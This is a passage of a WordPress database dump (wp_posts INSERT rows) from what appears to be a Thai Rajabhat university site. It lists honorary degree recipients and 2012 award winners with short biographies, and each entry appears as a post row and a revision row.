(495, 1, '2019-05-27 08:02:42', '2019-05-27 01:02:42', 'พระพรหมจริยาจารย์ (สงัด  ปัญญาวุโธ)\r\n\r\nปริญญาครุศาสตรดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  การบริหารการศึกษา\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'พระพรหมจริยาจารย์ (สงัด  ปัญญาวุโธ)', '', 'inherit', 'closed', 'closed', '', '494-revision-v1', '', '', '2019-05-27 08:02:42', '2019-05-27 01:02:42', '', 494, 'http://172.17.40.11/wp511/?p=495', 0, 'revision', '', 0),
(496, 1, '2019-05-27 08:02:54', '2019-05-27 01:02:54', 'พระครูวิจิตรธรรมภาณ (สลับ  รกขิตธมโม)\r\n\r\nปริญญาศิลปศาสตร์มหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  การพัฒนาชุมชน\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'พระครูวิจิตรธรรมภาณ (สลับ  รกขิตธมโม)', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%a7%e0%b8%b4%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%a3%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%93-%e0%b8%aa%e0%b8%a5%e0%b8%b1', '', '', '2019-05-27 08:02:54', '2019-05-27 01:02:54', '', 0, 'http://172.17.40.11/wp511/?p=496', 0, 'post', '', 0),
(497, 1, '2019-05-27 08:02:54', '2019-05-27 01:02:54', 'พระครูวิจิตรธรรมภาณ (สลับ  รกขิตธมโม)\r\n\r\nปริญญาศิลปศาสตร์มหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  การพัฒนาชุมชน\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'พระครูวิจิตรธรรมภาณ (สลับ  รกขิตธมโม)', '', 'inherit', 'closed', 'closed', '', '496-revision-v1', '', '', '2019-05-27 08:02:54', '2019-05-27 01:02:54', '', 496, 'http://172.17.40.11/wp511/?p=497', 0, 'revision', '', 0),
(498, 1, '2019-05-27 08:03:14', '2019-05-27 01:03:14', 'นายอาศิส  พิทักษ์คุมพล\r\n\r\nปริญญาศิลปศาสตร์ดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  การพัฒนาชุมชน\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'นายอาศิส  พิทักษ์คุมพล', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%b2%e0%b8%a8%e0%b8%b4%e0%b8%aa-%e0%b8%9e%e0%b8%b4%e0%b8%97%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b9%8c%e0%b8%84%e0%b8%b8%e0%b8%a1%e0%b8%9e%e0%b8%a5', '', '', '2019-05-27 08:08:49', '2019-05-27 01:08:49', '', 0, 'http://172.17.40.11/wp511/?p=498', 0, 'post', '', 0),
(499, 1, '2019-05-27 08:03:14', '2019-05-27 01:03:14', 'นายอาศิส  พิทักษ์คุมพล\r\n\r\nปริญญาศิลปศาสตร์ดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  การพัฒนาชุมชน\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'นายอาศิส  พิทักษ์คุมพล', '', 'inherit', 'closed', 'closed', '', '498-revision-v1', '', '', '2019-05-27 08:03:14', '2019-05-27 01:03:14', '', 498, 'http://172.17.40.11/wp511/?p=499', 0, 'revision', '', 0),
(500, 1, '2019-05-27 08:03:26', '2019-05-27 01:03:26', 'นายสรรค์  อัสโดดร\r\n\r\nปริญญาสาธารณสุขศาสตรมหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  สาธารณสุขชุมชน\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'นายสรรค์  อัสโดดร', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%aa%e0%b8%a3%e0%b8%a3%e0%b8%84%e0%b9%8c-%e0%b8%ad%e0%b8%b1%e0%b8%aa%e0%b9%82%e0%b8%94%e0%b8%94%e0%b8%a3', '', '', '2019-05-27 08:03:26', '2019-05-27 01:03:26', '', 0, 'http://172.17.40.11/wp511/?p=500', 0, 'post', '', 0),
(501, 1, '2019-05-27 08:03:26', '2019-05-27 01:03:26', 'นายสรรค์  อัสโดดร\r\n\r\nปริญญาสาธารณสุขศาสตรมหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  สาธารณสุขชุมชน\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'นายสรรค์  อัสโดดร', '', 'inherit', 'closed', 'closed', '', '500-revision-v1', '', '', '2019-05-27 08:03:26', '2019-05-27 01:03:26', '', 500, 'http://172.17.40.11/wp511/?p=501', 0, 'revision', '', 0),
(502, 1, '2019-05-27 08:03:40', '2019-05-27 01:03:40', 'นายโสภณ  สุภาพงษ์\r\n\r\nปริญญาบริหารธุรกิจดุษฎีบัณฑิตกิติมศักดิ์\r\n\r\nประจำปีการศึกษา 2555', 'นายโสภณ  สุภาพงษ์ (2555)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b9%82%e0%b8%aa%e0%b8%a0%e0%b8%93-%e0%b8%aa%e0%b8%b8%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%87%e0%b8%a9%e0%b9%8c-2555', '', '', '2019-05-27 08:03:40', '2019-05-27 01:03:40', '', 0, 'http://172.17.40.11/wp511/?p=502', 0, 'post', '', 0),
(503, 1, '2019-05-27 08:03:40', '2019-05-27 01:03:40', 'นายโสภณ  สุภาพงษ์\r\n\r\nปริญญาบริหารธุรกิจดุษฎีบัณฑิตกิติมศักดิ์\r\n\r\nประจำปีการศึกษา 2555', 'นายโสภณ  สุภาพงษ์ (2555)', '', 'inherit', 'closed', 'closed', '', '502-revision-v1', '', '', '2019-05-27 08:03:40', '2019-05-27 01:03:40', '', 502, 'http://172.17.40.11/wp511/?p=503', 0, 'revision', '', 0),
(504, 1, '2019-05-27 08:03:52', '2019-05-27 01:03:52', 'นายอัมพร  ด้วงปาน\r\n\r\nปริญญาศิลปศาสตร์ดุษฎีบัณฑิตกิติมศักดิ์  สาขาการพัฒนาชุมชน\r\n\r\nประจำปี 2555', 'นายอัมพร  ด้วงปาน (2555)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%a3-%e0%b8%94%e0%b9%89%e0%b8%a7%e0%b8%87%e0%b8%9b%e0%b8%b2%e0%b8%99-2555', '', '', '2019-05-27 08:03:52', '2019-05-27 01:03:52', '', 0, 'http://172.17.40.11/wp511/?p=504', 0, 'post', '', 0),
(505, 1, '2019-05-27 08:03:52', '2019-05-27 01:03:52', 'นายอัมพร  ด้วงปาน\r\n\r\nปริญญาศิลปศาสตร์ดุษฎีบัณฑิตกิติมศักดิ์  สาขาการพัฒนาชุมชน\r\n\r\nประจำปี 2555', 'นายอัมพร  ด้วงปาน (2555)', '', 'inherit', 'closed', 'closed', '', '504-revision-v1', '', '', '2019-05-27 08:03:52', '2019-05-27 01:03:52', '', 504, 'http://172.17.40.11/wp511/?p=505', 0, 'revision', '', 0),
(506, 1, '2019-05-27 08:04:15', '2019-05-27 01:04:15', 'นายสุขุม  ทองขุนดำ\r\n\r\nปริญญานิเทศศาสตร์มหาบัณฑิตกิติมศักดิ์  สาขาการสื่อสารเพื่อการพัฒนาท้องถิ่น\r\n\r\nประจำปี 2555', 'นายสุขุม  ทองขุนดำ (2555)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%aa%e0%b8%b8%e0%b8%82%e0%b8%b8%e0%b8%a1-%e0%b8%97%e0%b8%ad%e0%b8%87%e0%b8%82%e0%b8%b8%e0%b8%99%e0%b8%94%e0%b8%b3-2555', '', '', '2019-05-27 08:04:15', '2019-05-27 01:04:15', '', 0, 'http://172.17.40.11/wp511/?p=506', 0, 'post', '', 0),
(507, 1, '2019-05-27 08:04:15', '2019-05-27 01:04:15', 'นายสุขุม  ทองขุนดำ\r\n\r\nปริญญานิเทศศาสตร์มหาบัณฑิตกิติมศักดิ์  สาขาการสื่อสารเพื่อการพัฒนาท้องถิ่น\r\n\r\nประจำปี 2555', 'นายสุขุม  ทองขุนดำ (2555)', '', 'inherit', 'closed', 'closed', '', '506-revision-v1', '', '', '2019-05-27 08:04:15', '2019-05-27 01:04:15', '', 506, 'http://172.17.40.11/wp511/?p=507', 0, 'revision', '', 0),
(508, 1, '2019-05-27 08:04:29', '2019-05-27 01:04:29', 'นางปรียานันท์  สุนทรจามร (วงจันทร์  ไพโรจน์)\r\n\r\nปริญญาศิลปศาสตร์มหาบัณฑิตกิติมศักดิ์  สาขาวิชาดนตรี\r\n\r\nประจำปีการศึกษา 2555', 'นางปรียานันท์  สุนทรจามร  (วงจันทร์  ไพโรจน์) (2555)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%87%e0%b8%9b%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%b2%e0%b8%99%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b9%8c-%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%88%e0%b8%b2%e0%b8%a1%e0%b8%a3', '', '', '2019-05-27 08:04:29', '2019-05-27 01:04:29', '', 0, 'http://172.17.40.11/wp511/?p=508', 0, 'post', '', 0),
(509, 1, '2019-05-27 08:04:29', '2019-05-27 01:04:29', 'นางปรียานันท์  สุนทรจามร (วงจันทร์  ไพโรจน์)\r\n\r\nปริญญาศิลปศาสตร์มหาบัณฑิตกิติมศักดิ์  สาขาวิชาดนตรี\r\n\r\nประจำปีการศึกษา 2555', 'นางปรียานันท์  สุนทรจามร  (วงจันทร์  ไพโรจน์) (2555)', '', 'inherit', 'closed', 'closed', '', '508-revision-v1', '', '', '2019-05-27 08:04:29', '2019-05-27 01:04:29', '', 508, 'http://172.17.40.11/wp511/?p=509', 0, 'revision', '', 0),
(510, 1, '2019-05-27 08:04:40', '2019-05-27 01:04:40', 'นายน้อม  คงเกลี้ยง\r\n\r\nปริญญาศิลปศาสตร์มหาบัณฑิตกิติมศักดิ์  สาขาวิชานาฏศิลป์และการละคร\r\n\r\nประจำปี 2555', 'นายน้อม  คงเกลี้ยง (2555)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%99%e0%b9%89%e0%b8%ad%e0%b8%a1-%e0%b8%84%e0%b8%87%e0%b9%80%e0%b8%81%e0%b8%a5%e0%b8%b5%e0%b9%89%e0%b8%a2%e0%b8%87-2555', '', '', '2019-05-27 08:04:40', '2019-05-27 01:04:40', '', 0, 'http://172.17.40.11/wp511/?p=510', 0, 'post', '', 0),
(511, 1, '2019-05-27 08:04:40', '2019-05-27 01:04:40', 'นายน้อม  คงเกลี้ยง\r\n\r\nปริญญาศิลปศาสตร์มหาบัณฑิตกิติมศักดิ์  สาขาวิชานาฏศิลป์และการละคร\r\n\r\nประจำปี 2555', 'นายน้อม  คงเกลี้ยง (2555)', '', 'inherit', 'closed', 'closed', '', '510-revision-v1', '', '', '2019-05-27 08:04:40', '2019-05-27 01:04:40', '', 510, 'http://172.17.40.11/wp511/?p=511', 0, 'revision', '', 0),
(512, 1, '2019-05-27 08:03:55', '2019-05-27 01:03:55', 'นายอาศิส  พิทักษ์คุมพล\r\n\r\nปริญญาศิลปศาสตร์ดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  การพัฒนาชุมชน\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'นายอาศิส  พิทักษ์คุมพล', '', 'trash', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%b2%e0%b8%a8%e0%b8%b4%e0%b8%aa-%e0%b8%9e%e0%b8%b4%e0%b8%97%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b9%8c%e0%b8%84%e0%b8%b8%e0%b8%a1%e0%b8%9e%e0%b8%a5-2__trashed', '', '', '2019-05-27 08:07:15', '2019-05-27 01:07:15', '', 0, 'http://172.17.40.11/wp511/?p=512', 0, 'post', '', 0),
(513, 1, '2019-05-27 08:05:55', '2019-05-27 01:05:55', 'นายอาศิส  พิทักษ์คุมพล\r\n\r\nปริญญาศิลปศาสตร์ดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  การพัฒนาชุมชน\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'นายอาศิส  พิทักษ์คุมพล', '', 'inherit', 'closed', 'closed', '', '512-revision-v1', '', '', '2019-05-27 08:05:55', '2019-05-27 01:05:55', '', 512, 'http://172.17.40.11/wp511/?p=513', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(514, 1, '2019-05-27 08:27:38', '2019-05-27 01:27:38', 'นายอดุลย์  หวังจิ\r\n\r\nคนดีศรีราชภัฏ  ประจำปี  2555\r\n\r\nประเภทอาจารย์\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติ\r\n\r\nนายอดุลย์  หวังจิ\r\n\r\n-  เกิดเมื่อวันที่  14  พฤศจิกายน 2506\r\n\r\n-  จบการศึกษาระดับปริญญาตรี  ครุศาสตร์บัณฑิต  (การประถมศึกษา)  จากวิทยาลัยครูสงขลา  ปริญญาโท  ศึกษาศาสตร์มหาบัณฑิต  (การประถมศึกษา)  มหาวิทยาลัยสงขลานครินทร์  วิทยาเขตปัตตานี\r\n\r\n-  ประสบการณ์การทำงาน\r\n\r\n-  บรรจุรับราชการครูครั้งแรก  เมื่อวันที่ 1 กันยายน 2535  สังกัดโรงเรียนบ้านปะดะดอ สปอ.ตากใบ สปจ.นราธิวาส  ตำแหน่งอาจารย์ 1 ระดับ 3  โอนเข้ามาสังกัดสถาบันราชภัฏสงขลา  คณะครุศาสตร์  ภาควิชาโรงเรียนสาธิต  ตั้งแต่วันที่ 15 กันยายน 2537  ตำแหน่งอาจารยื 1 ระดับ 4\r\n\r\n-  ปัจจุบันดำรงตำแหน่ง  ผู้อำนวยการโรงเรียนสาธิต  มหาวิทยาลัยราชภัฏสงขลา', 'นายอดุลย์  หวังจิ', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%94%e0%b8%b8%e0%b8%a5%e0%b8%a2%e0%b9%8c-%e0%b8%ab%e0%b8%a7%e0%b8%b1%e0%b8%87%e0%b8%88%e0%b8%b4', '', '', '2019-05-27 08:27:38', '2019-05-27 01:27:38', '', 0, 'http://172.17.40.11/wp511/?p=514', 0, 'post', '', 0),
(515, 1, '2019-05-27 08:27:38', '2019-05-27 01:27:38', 'นายอดุลย์  หวังจิ\r\n\r\nคนดีศรีราชภัฏ  ประจำปี  2555\r\n\r\nประเภทอาจารย์\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติ\r\n\r\nนายอดุลย์  หวังจิ\r\n\r\n-  เกิดเมื่อวันที่  14  พฤศจิกายน 2506\r\n\r\n-  จบการศึกษาระดับปริญญาตรี  ครุศาสตร์บัณฑิต  (การประถมศึกษา)  จากวิทยาลัยครูสงขลา  ปริญญาโท  ศึกษาศาสตร์มหาบัณฑิต  (การประถมศึกษา)  มหาวิทยาลัยสงขลานครินทร์  วิทยาเขตปัตตานี\r\n\r\n-  ประสบการณ์การทำงาน\r\n\r\n-  บรรจุรับราชการครูครั้งแรก  เมื่อวันที่ 1 กันยายน 2535  สังกัดโรงเรียนบ้านปะดะดอ สปอ.ตากใบ สปจ.นราธิวาส  ตำแหน่งอาจารย์ 1 ระดับ 3  โอนเข้ามาสังกัดสถาบันราชภัฏสงขลา  คณะครุศาสตร์  ภาควิชาโรงเรียนสาธิต  ตั้งแต่วันที่ 15 กันยายน 2537  ตำแหน่งอาจารยื 1 ระดับ 4\r\n\r\n-  ปัจจุบันดำรงตำแหน่ง  ผู้อำนวยการโรงเรียนสาธิต  มหาวิทยาลัยราชภัฏสงขลา', 'นายอดุลย์  หวังจิ', '', 'inherit', 'closed', 'closed', '', '514-revision-v1', '', '', '2019-05-27 08:27:38', '2019-05-27 01:27:38', '', 514, 'http://172.17.40.11/wp511/?p=515', 0, 'revision', '', 0),
(516, 1, '2019-05-27 08:28:03', '2019-05-27 01:28:03', 'ดร.นาที  รัชกิจประการ\r\n\r\nคนดีศรีราชภัฏ  ประจำปี 2555\r\n\r\nประเภทศิษย์เก่า\r\n\r\n<hr id="system-readmore" />\r\n\r\nปรระวัติ\r\n\r\nดร.นาที  รัชกิจประการ\r\n\r\n-  เกิดเมื่อวันที่  20  สิงหาคม  2502\r\n\r\n-  จบการศึกษาปริญญาตรี  ครุศาสตร์บัณฑิต  สาขาภาษาอังกฤษ  จากวิทยาลัยครูสวนสุนันทา  ปริญยาโท  บริหารธุรกิจมหาบัณฑิต  (MBA)  จาก  Sommerset  University  ประเทศอังกฤษ  ปริญญาโท  ครุศาสตร์บัณฑิต  สาขาการจัดการคุณภาพสถาบันราชภัฏสวนสุนันทา  ปริญญาเอก  จากคณะศาสนศาสตร์ดุษฏีบัณฑิต  มหาวิทยาลัยมกุฏราชวิทยาลัย\r\n\r\n-  ปัจจุบันดำรงตำแหน่ง  สมาชิกสภาผู้แทนราษฎร  บัญชีรายชื่อ  พรรคภูมิใจไทย\r\n\r\n-  ประสบการณ์การทำงาน\r\n\r\n-  เจ้าของร้านอาหารไทย  ชื่อ  บูรพา  ในเมืองคริสตันพาเลช  ประเทศอังกฤษ\r\n\r\n-  ประธานบริหารบ้านสวนสายป่านรีสอร์ท  อ.มวกเหล็ก  จ.สระบุรี\r\n\r\n-  อดีตสมาชิกวุฒิสภาจังหวัดพัทลุง\r\n\r\n-  ประธานคณะกรรมการเขตพื้นที่การศึกษาที่ 1 จังหวัดพัทลุง\r\n\r\n-  ประธานคณะกรรมการสภาพัฒนาสตรีจังหวัดพัทลุง\r\n\r\n-  ประธานสมัชชาสตรี  จังหวัดพัทลุง\r\n\r\n-  ประธานอนุกรรมการจัดสร้างศูนย์ปฏิบัติธรรมเฉลิมพระเกียรติ  จังหวัดพัทลุง\r\n\r\n-  ประธานนักศึกษา  รุ่นที่4  หลักสูตรผู้นำการเมือง  สถาบันพระปกเกล้า', 'ดร.นาที  รัชกิจประการ', '', 'publish', 'closed', 'open', '', '%e0%b8%94%e0%b8%a3-%e0%b8%99%e0%b8%b2%e0%b8%97%e0%b8%b5-%e0%b8%a3%e0%b8%b1%e0%b8%8a%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2019-05-27 08:28:03', '2019-05-27 01:28:03', '', 0, 'http://172.17.40.11/wp511/?p=516', 0, 'post', '', 0),
(517, 1, '2019-05-27 08:28:03', '2019-05-27 01:28:03', 'ดร.นาที  รัชกิจประการ\r\n\r\nคนดีศรีราชภัฏ  ประจำปี 2555\r\n\r\nประเภทศิษย์เก่า\r\n\r\n<hr id="system-readmore" />\r\n\r\nปรระวัติ\r\n\r\nดร.นาที  รัชกิจประการ\r\n\r\n-  เกิดเมื่อวันที่  20  สิงหาคม  2502\r\n\r\n-  จบการศึกษาปริญญาตรี  ครุศาสตร์บัณฑิต  สาขาภาษาอังกฤษ  จากวิทยาลัยครูสวนสุนันทา  ปริญยาโท  บริหารธุรกิจมหาบัณฑิต  (MBA)  จาก  Sommerset  University  ประเทศอังกฤษ  ปริญญาโท  ครุศาสตร์บัณฑิต  สาขาการจัดการคุณภาพสถาบันราชภัฏสวนสุนันทา  ปริญญาเอก  จากคณะศาสนศาสตร์ดุษฏีบัณฑิต  มหาวิทยาลัยมกุฏราชวิทยาลัย\r\n\r\n-  ปัจจุบันดำรงตำแหน่ง  สมาชิกสภาผู้แทนราษฎร  บัญชีรายชื่อ  พรรคภูมิใจไทย\r\n\r\n-  ประสบการณ์การทำงาน\r\n\r\n-  เจ้าของร้านอาหารไทย  ชื่อ  บูรพา  ในเมืองคริสตันพาเลช  ประเทศอังกฤษ\r\n\r\n-  ประธานบริหารบ้านสวนสายป่านรีสอร์ท  อ.มวกเหล็ก  จ.สระบุรี\r\n\r\n-  อดีตสมาชิกวุฒิสภาจังหวัดพัทลุง\r\n\r\n-  ประธานคณะกรรมการเขตพื้นที่การศึกษาที่ 1 จังหวัดพัทลุง\r\n\r\n-  ประธานคณะกรรมการสภาพัฒนาสตรีจังหวัดพัทลุง\r\n\r\n-  ประธานสมัชชาสตรี  จังหวัดพัทลุง\r\n\r\n-  ประธานอนุกรรมการจัดสร้างศูนย์ปฏิบัติธรรมเฉลิมพระเกียรติ  จังหวัดพัทลุง\r\n\r\n-  ประธานนักศึกษา  รุ่นที่4  หลักสูตรผู้นำการเมือง  สถาบันพระปกเกล้า', 'ดร.นาที  รัชกิจประการ', '', 'inherit', 'closed', 'closed', '', '516-revision-v1', '', '', '2019-05-27 08:28:03', '2019-05-27 01:28:03', '', 516, 'http://172.17.40.11/wp511/?p=517', 0, 'revision', '', 0),
(518, 1, '2019-05-27 08:28:25', '2019-05-27 01:28:25', 'นางปิยมาศ  ศิริศุภนนท์\r\n\r\nคนดีศรีราชภัฏ  ประจำปี  2555\r\n\r\nประเภทบุคลากรสายสนับสนุน\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติ\r\n\r\nนางปิยมาศ  ศิริศุภนนท์\r\n\r\n-  เกิดเมื่อวันที่  9  เมษายน 2512\r\n\r\n-  จบการศึกษาระดับปริญญาตรี  คณะศึกษาศาสตร์  วิชาเอกคณิตศาสตร์ (วทบ.)  จากมหาวิทยาลัยสงขลานครินทร์  วิทยาเขตปัตตานี  ระดับปริญญาโท  ศิลปศาสตร์มหาบัณฑิต (ศศ.ม.)  สาขานโยบายและการวางแผนสังคม  มหาวิทยาลัยทักษิณ\r\n\r\n-  ประสบการณ์การทำงาน\r\n\r\n-  เริ่มรับราชการเมื่อวันที่  17 มิถุนายน 2534  ในตำแหน่งนักสถิติ  สังกัดวิทยาลัยครูสงขลา\r\n\r\n-  ปัจจุบันดำรงตำแหน่ง  ผู้อำนวยการกองนโยบายและแผน  สำนักงานอธิการบดี  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  ได้รับรางวัลข้าราชการพลเรือนดีเด่น  ประจำปี 2554', 'นางปิยมาศ  ศิริศุภนนท์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%87%e0%b8%9b%e0%b8%b4%e0%b8%a2%e0%b8%a1%e0%b8%b2%e0%b8%a8-%e0%b8%a8%e0%b8%b4%e0%b8%a3%e0%b8%b4%e0%b8%a8%e0%b8%b8%e0%b8%a0%e0%b8%99%e0%b8%99%e0%b8%97%e0%b9%8c', '', '', '2019-05-27 08:28:25', '2019-05-27 01:28:25', '', 0, 'http://172.17.40.11/wp511/?p=518', 0, 'post', '', 0),
(519, 1, '2019-05-27 08:28:25', '2019-05-27 01:28:25', 'นางปิยมาศ  ศิริศุภนนท์\r\n\r\nคนดีศรีราชภัฏ  ประจำปี  2555\r\n\r\nประเภทบุคลากรสายสนับสนุน\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติ\r\n\r\nนางปิยมาศ  ศิริศุภนนท์\r\n\r\n-  เกิดเมื่อวันที่  9  เมษายน 2512\r\n\r\n-  จบการศึกษาระดับปริญญาตรี  คณะศึกษาศาสตร์  วิชาเอกคณิตศาสตร์ (วทบ.)  จากมหาวิทยาลัยสงขลานครินทร์  วิทยาเขตปัตตานี  ระดับปริญญาโท  ศิลปศาสตร์มหาบัณฑิต (ศศ.ม.)  สาขานโยบายและการวางแผนสังคม  มหาวิทยาลัยทักษิณ\r\n\r\n-  ประสบการณ์การทำงาน\r\n\r\n-  เริ่มรับราชการเมื่อวันที่  17 มิถุนายน 2534  ในตำแหน่งนักสถิติ  สังกัดวิทยาลัยครูสงขลา\r\n\r\n-  ปัจจุบันดำรงตำแหน่ง  ผู้อำนวยการกองนโยบายและแผน  สำนักงานอธิการบดี  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  ได้รับรางวัลข้าราชการพลเรือนดีเด่น  ประจำปี 2554', 'นางปิยมาศ  ศิริศุภนนท์', '', 'inherit', 'closed', 'closed', '', '518-revision-v1', '', '', '2019-05-27 08:28:25', '2019-05-27 01:28:25', '', 518, 'http://172.17.40.11/wp511/?p=519', 0, 'revision', '', 0),
(520, 1, '2019-05-27 08:28:46', '2019-05-27 01:28:46', 'นายธีระศักดิ์  ชูเพ็ง\r\n\r\nคนดีศรีราชภัฏ  ประจำปี  2555\r\n\r\nประเภทนักศึกษา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติ\r\n\r\n-  เกิดเมื่อวันที่ 7 เมษายน 2534\r\n\r\n-  จบการศึกษาระดับประถมศึกษา  จากโรงเรียนวัดป่าตอ  อ.ควนขนุน  จ.พัทลุง  มัธยมศึกษาตอนต้น  และมัธยมศึกษาตอนปลายโรงเรียนควนขนุน  จ.พัทลุง  สอบไล่ได้ธรรมศึกษาชั้นโท  และธรรมศึกษาชั้นเอก  จากสำนักเรียนคณะ  จ.พัทลุง  ปัจจุบันกำลังศึกษาปริญญาตรี  โปรแกรมวิชาการพัฒนาชุมชน  คณะมนุาย์ศาสตรืและสังคมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  รับเสด็จพระเทพรัตนราชสุดาฯ  สยามบรมราชกุมารี  ในงานสามทศวรรษฯ\r\n\r\n-  ได้รับรางวัลคนดีในดวงใจ  ในรายวิชาเรียนรู้คุณธรรมนำชีวิตพอเพียง\r\n\r\n-  รำมโนราห์ในงานนาฏดุริยศิลป์  ณ ถิ่นล้านนา  ณ มหาวิทยาลัยเชียงใหม่  เป็นการแลกเปลี่ยนศิลปะและวัฒนธรรมภาคใต้  โดยสำนักงานคณะกรรมการการอุดมศึกษา\r\n\r\n-  เป็นผู้จัดโครงการทำดีเพื่อพ่อ - แม่  ทุกวันพฤหัสบดี  ณ  สำนักศิลปและวัฒนธรรม\r\n\r\n-  เข้าร่วมโครงการสัมมนาวิชาการเครือข่ายนิสิต  นักศึกษา  คณาจารย์  การพัฒนาชุมชนและสังคมแห่งประเทศไทย  ครั้งที่11  ณ มหาวิทยาลัยราชภัฏนครศรีธรรมราช  และได้รับคัดเลือกเป็นทูตนักพัฒนาชุมชน ฯลฯ', 'นายธีระศักดิ์  ชูเพ็ง', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%98%e0%b8%b5%e0%b8%a3%e0%b8%b0%e0%b8%a8%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b4%e0%b9%8c-%e0%b8%8a%e0%b8%b9%e0%b9%80%e0%b8%9e%e0%b9%87%e0%b8%87', '', '', '2019-05-27 08:28:46', '2019-05-27 01:28:46', '', 0, 'http://172.17.40.11/wp511/?p=520', 0, 'post', '', 0),
(521, 1, '2019-05-27 08:28:46', '2019-05-27 01:28:46', 'นายธีระศักดิ์  ชูเพ็ง\r\n\r\nคนดีศรีราชภัฏ  ประจำปี  2555\r\n\r\nประเภทนักศึกษา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติ\r\n\r\n-  เกิดเมื่อวันที่ 7 เมษายน 2534\r\n\r\n-  จบการศึกษาระดับประถมศึกษา  จากโรงเรียนวัดป่าตอ  อ.ควนขนุน  จ.พัทลุง  มัธยมศึกษาตอนต้น  และมัธยมศึกษาตอนปลายโรงเรียนควนขนุน  จ.พัทลุง  สอบไล่ได้ธรรมศึกษาชั้นโท  และธรรมศึกษาชั้นเอก  จากสำนักเรียนคณะ  จ.พัทลุง  ปัจจุบันกำลังศึกษาปริญญาตรี  โปรแกรมวิชาการพัฒนาชุมชน  คณะมนุาย์ศาสตรืและสังคมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  รับเสด็จพระเทพรัตนราชสุดาฯ  สยามบรมราชกุมารี  ในงานสามทศวรรษฯ\r\n\r\n-  ได้รับรางวัลคนดีในดวงใจ  ในรายวิชาเรียนรู้คุณธรรมนำชีวิตพอเพียง\r\n\r\n-  รำมโนราห์ในงานนาฏดุริยศิลป์  ณ ถิ่นล้านนา  ณ มหาวิทยาลัยเชียงใหม่  เป็นการแลกเปลี่ยนศิลปะและวัฒนธรรมภาคใต้  โดยสำนักงานคณะกรรมการการอุดมศึกษา\r\n\r\n-  เป็นผู้จัดโครงการทำดีเพื่อพ่อ - แม่  ทุกวันพฤหัสบดี  ณ  สำนักศิลปและวัฒนธรรม\r\n\r\n-  เข้าร่วมโครงการสัมมนาวิชาการเครือข่ายนิสิต  นักศึกษา  คณาจารย์  การพัฒนาชุมชนและสังคมแห่งประเทศไทย  ครั้งที่11  ณ มหาวิทยาลัยราชภัฏนครศรีธรรมราช  และได้รับคัดเลือกเป็นทูตนักพัฒนาชุมชน ฯลฯ', 'นายธีระศักดิ์  ชูเพ็ง', '', 'inherit', 'closed', 'closed', '', '520-revision-v1', 